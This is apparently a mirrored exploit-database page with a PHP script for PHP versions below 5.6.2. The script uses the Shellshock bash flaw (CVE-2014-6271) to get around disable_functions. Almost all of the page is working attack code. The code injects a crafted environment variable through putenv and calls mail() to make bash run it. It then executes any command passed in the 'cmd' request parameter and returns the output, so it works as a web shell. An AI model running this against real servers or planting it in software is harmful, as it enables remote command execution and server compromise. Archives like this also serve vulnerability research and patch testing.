Skip to content
cyberexploits
webappphptext

PHP < 5.6.2 - Bypass disable_functions Exploit (Shellshock)

PHP < 5.6.2 - Bypass disable_functions Exploit (Shellshock)

Publié le 2014-11-03

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/php/webapps/35146.txt7eac4c3a
raw
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)

# Google Dork: none

# Date: 10/31/2014

# Exploit Author: Ryan King (Starfall)

# Vendor Homepage: http://php.net

# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror

# Version: 5.* (tested on 5.6.2)

# Tested on: Debian 7 and CentOS 5 and 6

# CVE: CVE-2014-6271

<pre>

<?php echo "Disabled functions: ".ini_get('disable_functions')."\n"; ?>

<?php

function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283

   if(strstr(readlink("/bin/sh"), "bash") != FALSE) {

     $tmp = tempnam(".","data");

     putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");

     // In Safe Mode, the user may only alter environment variables whose names

     // begin with the prefixes supplied by this directive.

     // By default, users will only be able to set environment variables that

     // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,

     // PHP will let the user modify ANY environment variable!

     mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually send any mail

   }

   else return "Not vuln (not bash)";

   $output = @file_get_contents($tmp);

   @unlink($tmp);

   if($output != "") return $output;

   else return "No output, or not vuln.";

}

echo shellshock($_REQUEST["cmd"]);

?>
Voir sur GitHub